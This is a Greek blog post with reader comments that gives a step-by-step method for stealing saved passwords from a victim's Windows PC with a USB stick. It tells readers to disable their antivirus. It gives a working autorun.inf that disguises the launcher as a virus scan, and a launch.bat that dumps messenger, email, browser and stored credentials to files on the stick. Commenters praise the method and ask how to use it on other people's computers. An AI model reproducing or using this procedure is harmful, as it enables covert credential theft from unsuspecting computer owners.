Social Icons

Πώς να κατεβάσετε τα Linux και να τα γράψετε σε DVD ή USB..

1o Μέρος Σε αυτό το πρώτο μέρος της ανάρτησεις θα περιγράψουμε Βήμα Βήμα πώς να κατεβάσετε τα Linux και να τα γράψετε σε ένα DVD ή USB...

Πώς να δημιουργήσετε το δικό σας online ερωτηματολόγιο εύκολα και γρήγορα!

Η Google έχει βελτιώσει το συγκεκριμένο εργαλείο με νέες επιλογές και στοιχεία. Σε αυτήν λοιπόν την δημοσίευση θα σας περιγράψουμε από την αρχή την δημιουργία ενός online ερωτηματολογίου με τα νέα αυτά δεδομένα!

Sleep X: Πρόγραμμα για να κλείσετε με προεπιλεγμένο χρόνο τον υπολογιστή σας!

Σε αυτόν τον οδηγό θα περιγράψουμε πώς μπορούμε να βάλουμε να κλείσουμε τον υπολογιστή μας σε όσο χρόνο θέλουμε εμείς. Το πρόγραμμα που θα χρησιμοποιήσουμε είναι το "Sleep X"!

Format Factory: Ένα πρόγραμμα που μετατρέπει σχεδόν "τα πάντα".

Άν έχετε βαρεθεί τα προγράμματα που υπάρχουν στο internet που υπόσχονται μετά το δωρεάν "κατέβασμα" τους παντός είδους μετατροπές, αλλά μετά την εγκατάσταση ζητάνε να αγοράσετε άδεια χρήσης και μετατρέπουν μόνο το μισό αρχείο, ήρθε για εσάς το "Format Factory". Ένα εύχρηστο δωρεάν πρόγραμμα μετατροπής που υποστηρίζει όλες τις γνωστές επεκτάσεις αρχείων.

Πώς να λύσετε το πρόβλημα με τις μπλέ οθόνες (Blue Screen)

Τί ακριβώς σημαίνουν τα «κινέζικα» που διαβάζουμε στις μπλε οθόνες; Ποιά είναι η πηγή του προβλήματος; Πώς μπορούμε να το λύσουμε;

Τετάρτη 6 Ιανουαρίου 2010

Πώς να υποκλέψετε κωδικούς με USB Stick.

Τα windows αποθηκεύουν τους κωδικούς που χρησιμοποιούμε σε καθημερινή βάση, συμπεριλαμβανομένου και τους κωδικούς instant messenger SN, Yahoo, AOL, Windows messenger κτλ... Μαζί με αυτά, τα windows κρατούν και τους κωδικούς πρόσβασης των utlook Express, SMTP, POP, FTP κτλ όπως και των αποθηκευμένων κωδικών διάφορων browsers πχ IE ή Firefox. Υπάρχουν πολλά εργαλεία για την ανάκτηση και υποκλοπή αυτών των κωδικών. Χρησιμοποιώντας μερικά εργαλεία και ένα usb stick μπορείτε να δημιουργήσετε μια αυτόματη εντολή, η οποία μώλις ενεργοποιηθεί συλλέγει όλους τους κωδικούς ενός υπολογιστή.

Τα εργαλεία που θα χρειαστούμε είναι:

MessenPass: Ανακτά τους κωδικούς απο τα ποιό διάσημα Instant Messenger προγράμματα όπως MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger με Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Ανακτά τους κωδικούς απο τα παρακάτω διάσημα προγράμματα e-mail: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP και SMTP), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free. Το Mail PassView μπορεί επίσης να ανακτήσει κωδικούς απο online υπηρεσίες e-mail όπως HotMail, Yahoo!, Gmail, άν εάν χρησιμοποιείτε η σχετική υπηρεσία των λογαριασμών αυτών.

IE Passview: Είναι ένα μικρό βοηθητικό πρόγραμμα που υποκλέπτει τους κωδικούς πρόσβασης που αποθηκεύονται από τον Internet Explorer. Υποστηρίζει το Internet Explorer 7.0, καθώς και παλαιότερες εκδόσεις του Internet Explorer, v4.0 - v6.0

Protected Storage PassView: Ανακτά όλους τους κωδικούς πρόσβασης που αποθηκεύονται μέσα σε Protected Storage, συμπεριλαμβανομένου τους Αυτόματους κωδικούς πρόσβασης του Internet Explorer, κωδικούς πρόσβασης με προστασία κωδικού πρόσβασης Sites, MSN Explorer, κτλ

PasswordFox: Είναι ένα μικρό εργαλείο αποκατάστασης κωδικού πρόσβασης που σας επιτρέπει να δείτε τα ονόματα χρηστών και τους κωδικούς πρόσβασης που αποθηκεύονται από τον Mozilla Firefox. Από προεπιλογή, το PasswordFox εμφανίζει τους κωδικούς πρόσβασης που αποθηκεύονται στο τρέχον προφίλ σας, αλλά μπορείτε εύκολα να επιλέξετε να δείτε τους κωδικούς πρόσβασης από οποιοδήποτε άλλο προφίλ Firefox. Για κάθε καταχώρηση κωδικού πρόσβασης, εμφανίζονται οι ακόλουθες πληροφορίες : Εγγραφή Index, Web Site, Όνομα χρήστη, Κωδικός πρόσβασης, Τομέας Όνομα χρήστη, Πεδίο Κωδικού πρόσβασης , και το όνομα του αρχείου Signons.

Παρακάτω περιγράφετε τί πρέπει να κάνετε για να αυτοματοποιηθούν οι εντολές έτσι ώστε μώλις θα βάλετε το flashάκι να τραβίξει όλους τους κωδικούς χωρίς να πρέπει να τρέξετε το κάθε πρόγραμμα ξεχωριστά.


ΠΡΟΣΟΧΗ!!!

ΠΡΙΝ ΚΑΤΕΒΑΣΕΤΕ ΤΑ ΠΑΡΑΠΑΝΩ ΠΡΟΓΡΑΜΜΑΤΑ ΚΑΙ ΣΥΝΕΧΙΣΕΤΕ ΣΤΑ ΠΑΡΑΚΑΤΩ ΒΗΜΑΤΑ ΚΑΛΟ ΘΑ ΗΤΑΝ ΝΑ ΑΠΕΝΕΡΓΟΠΟΙΗΣΕΤΕ ΤΟ ANTIVIRUS ΣΑΣ !!!!

1.Κατεβάστε και αποσυμπιέστε τα και τα 5 παραπάνω προγράμματα. (Μπορείτε να τα κατεβάσετε πατώντας πάνω στο ονομά τους ή στη περιγραφή τους)

 
2.Αντιγράψτε τα εκτελέσιμα αρχεία (.exe) και κάντε τα επικόλληση μέσα στο flashάκι. (δηλαδή τα mspass.exe, mailpv.exe, iepv.exe, pspv.exe και passwordfox.exe να βρίσκονται μέσα στο usb stick)

3.Ανοίξτε το Σημειωματάριο και γράψτε τα ακόλουθα μέσα:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

4.Αποθηκεύστε το και μετονομάστε το σε autorun.inf

5.Βάλτε το αρχείο autorun.inf στο flashάκι.

6.Ανοίξτε νέο σημειωματάριο και γράψτε τα ακόλουθα:

start mspass.exe /stext mspass.txt


start mailpv.exe /stext mailpv.txt


start iepv.exe /stext iepv.txt


start pspv.exe /stext pspv.txt


start passwordfox.exe /stext passwordfox.txt
 

7.Αποθηκεύστε το και μετονομάστε το σε launch.bat

8.Βάλτε το launch.bat στο flashάκι.

Οπότε τα περιεχόμενα στο flashάκι σας θα είναι κάπως έτσι:


Τώρα μώλις βάλετε το flashάκι στο υπολογιστή του θύματος θα ανοίξει ένα παράθυρο autorun. Επιλέξτε τι πρώτη επιλογή η οποία ζητάει να γίνει scan για ιούς.. Όλοι οι κωδικοί αποθηκεύτηκαν στο flashάκι σε αρχεία .txt. 


Δοκιμασμένο σε windows 2000, XP, Vista and Windows 7




6 σχόλια :

Ανώνυμος είπε...

Μια χαρά όλα φίλε μου, αυτό που με φοβίζει λίγο είναι το ότι θα πρέπει να απενεργοποιήσω το antivirus.
Αν το antivirus έχει δίκιο που μου το χαρακτήρισε αρχείο υψηλού κινδύνου ,με φοβίζει να το βάλω στον υπολογιστή μου...

Μάδε είπε...

Το antivirus μπλοκάρει όλων των ειδών κακόβουλα προγράμματα.

Τα παραπάνω προγράμματα είναι κακόβουλα με την έννοια ότι υποκλέπτουν κάτι...

Αν δεν απενεργοποιήσεις το antivirus δεν θα σε αφήσεις να τα πειράξεις, ούτε καν τα τρέξεις...


Καλά κάνεις και είσαι καχύποπτος, τα παραπάνω προγράμματα όμως τα έχω τσεκάρει ο ίδιος.

noic είπε...

file auto mporw na to dokimasw kai sto diko mou pc h 9a pa9h tpt.?

noic είπε...

para polu kalos!!!me liga logia bazw to stickaki se kapio pc kai me auth tin diadikasia klevo tous kodikous tou apo selides kai programata opws msn?kai kati allo..dn mporw na katevasw auta ta programata apo ekei..mou vgazei diafora..pou akrivws kanw download?an mporeis file mou se parakalo apantise mou...euxaristw!

Ανώνυμος είπε...

Κάτω-κάτω στις σελίδες λέει download(λίγο πριν το τέλος), τα περισσότερα μπορείς να τα κατεβάσεις με 2 τρόπους(εκτός από τα 2 τελευταία.
Αν δεν κλείσεις το antivirus δεν τρέχουν κάν.

panagiwths είπε...

poli kalos filaraki.. mpravo mpavo ;))